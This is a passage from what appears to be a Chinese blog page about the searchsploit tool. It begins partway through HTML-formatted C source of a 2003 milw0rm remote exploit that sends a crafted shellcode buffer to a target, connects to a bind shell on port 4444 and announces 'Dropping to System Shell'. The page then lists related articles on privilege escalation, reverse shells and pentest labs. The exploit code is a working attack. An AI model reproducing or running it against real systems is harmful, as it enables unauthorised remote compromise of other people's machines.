</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xb4</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xb4</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xb8</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xb8</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xd0</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0xd0</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;
</span>*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x18c</span>)=*(unsigned <span style="color: #0000ff;">long</span> *)(buf2+<span style="color: #800080;">0x18c</span>)+<span style="color: #0000ff;">sizeof</span>(sc)-<span style="color: #800080;">0xc</span><span style="color: #000000;">;</span><span style="color: #0000ff;">if</span> (send(sock,bindstr,<span style="color: #0000ff;">sizeof</span>(bindstr),<span style="color: #800080;">0</span>)== -<span style="color: #800080;">1</span><span style="color: #000000;">)
{perror(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Send</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}
len</span>=recv(sock, buf1, <span style="color: #800080;">1000</span>, <span style="color: #800080;">0</span><span style="color: #000000;">);</span><span style="color: #0000ff;">if</span> (send(sock,buf2,len1,<span style="color: #800080;">0</span>)== -<span style="color: #800080;">1</span><span style="color: #000000;">)
{perror(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Send</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}
close(sock);
sleep(</span><span style="color: #800080;">1</span><span style="color: #000000;">);target_ip.sin_family </span>=<span style="color: #000000;"> AF_INET;
target_ip.sin_addr.s_addr </span>= inet_addr(argv[<span style="color: #800080;">2</span><span style="color: #000000;">]);
target_ip.sin_port </span>= htons(<span style="color: #800080;">4444</span><span style="color: #000000;">);</span><span style="color: #0000ff;">if</span> ((sock=socket(AF_INET,SOCK_STREAM,<span style="color: #800080;">0</span>)) == -<span style="color: #800080;">1</span><span style="color: #000000;">)
{perror(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Socket</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}</span><span style="color: #0000ff;">if</span>(connect(sock,(<span style="color: #0000ff;">struct</span> sockaddr *)&amp;target_ip, <span style="color: #0000ff;">sizeof</span>(target_ip)) != <span style="color: #800080;">0</span><span style="color: #000000;">)
{printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Exploit appeared to have failed.\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);
}   printf(</span><span style="color: #800000;">"</span><span style="color: #800000;">- Dropping to System Shell...\n\n</span><span style="color: #800000;">"</span><span style="color: #000000;">);shell(sock);</span><span style="color: #0000ff;">return</span>(<span style="color: #800080;">0</span><span style="color: #000000;">);

}

// milw0rm.com [2003-07-26]

View Code

　　查找apple的漏洞

searchsploit apple

作者： NONO
出处：http://www.cnblogs.com/diligenceday/

Searchsploit相关推荐

1. searchsploit工具(exploit-db.com)使用实例 (linux 内核漏洞提权) exploitdb

   获取 root 权限是 Linux 漏洞利用的终极目标.跟 Windows 中的 System 用户一样,root 用户拥有对操作系统的所有管理权限.在渗透中,有时候成功利用某些漏洞只会获取一个低权限 ...

2. searchsploit漏洞查找工具使用指南(exploit-db.com 离线工具 exploitdb)

   什么是SearchSploit: "searchsploit"是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本. SearchSplo ...

3. searchsploit漏洞查找工具使用指南(exploit-db.com 离线工具)

   什么是SearchSploit: "searchsploit"是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本. SearchSplo ...

4. searchsploit 漏洞搜索

   文章目录 1. 背景 2. 简介 3. 下载.安装.更新 4. 语法 5. 实例 5.1 帮助 5.2 搜索漏洞关键字afd的Windows本地利用漏洞 5.3 搜索标题中包含oracle windo ...

5. 2021Kali系列 -- 漏洞搜索(searchsploit)

   我以为我不理你,你会难过,可结果呢,难过的是我... ----  网易云热评 简介:通过搜索关键词找到需要的漏洞,可以理解为一个离线的漏洞库 一.命令 searchsploit 1.-c --case ...

6. 提权（概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit）

   文章目录 提权 一.概述 二.水平越权&垂直越权 三.分类 - windows 1. 基于windows2003 2. 基于windows2008 3. ms SQL提权 5. nc反弹she ...

7. Lampiao靶机渗透测试

   文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...

8. 推箱子2-向右推!_保持冷静，砍箱子-me脚

   推箱子2-向右推! Hack The Box (HTB) is an online platform allowing you to test your penetration testing ski ...

9. linux 提权方法总结

   几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏 ...

最新文章

1. cmake的使用-为什么要使用CMake
2. winform在表格中输入一个完整的时间字段_B端交互组件之表格篇
3. leetcode(3)---寻找最大字符串
4. Fix My iPhone Mac版：修复iPhone白苹果、黑屏、卡住恢复错误等iOS 15 升级失败
5. 文档下载：《两万字深度介绍分布式系统原理》.pdf
6. Auto ARIMA 逐个时间点预测
7. java 136年以后的时间_136年清明查询 - 136年清明是几号 - 136年清明具体时间
8. js中JSON转对象、对象转JSON
9. VSCode使用eclipse快捷键
10. 《工业设计史》 第三章：18世纪的设计与商业
11. linux安装 jenkins（清华大学镜像站）
12. Android Studio Gradle实践之多渠道自动化打包+版本号管理
13. Linux学习日记- - -配置篇##1
14. adb脚本选择语句_常用adb命令汇总(绝对干货)
15. 分数阶偏微分差分方程MATLAB,分数阶偏微分方程及其数值方法.ppt
16. 淮阴工学院计算机科学讲师,淮阴工学院计算机与软件工程学院统战人士工作业绩...
17. 苹果党福利！手机数据备份恢复使用攻略
18. JS - 日期时间比较函数
19. 到Nexus私服的发包实践
20. 用投影机控制软件2017 V3（可在多媒体教室代替遥控器中控机）

热门文章

1. Oracle 11g创建Interval分区表
2. 如何删除以横线“-”开头的文件
3. AIX卷管理介绍以及利用空闲PP来创建文件系统
4. ORACLE TEXT FILTER PREFERENCE（一）
5. 设置Linux虚拟机和主机在同一网段
6. Battery historian安装及使用
7. JavaScript中this的指向问题
8. Hark的数据结构与算法练习之简单选择排序
9. C/C++变量命名规则，个人习惯总结
10. Nginx 配置 SSL 证书步骤小记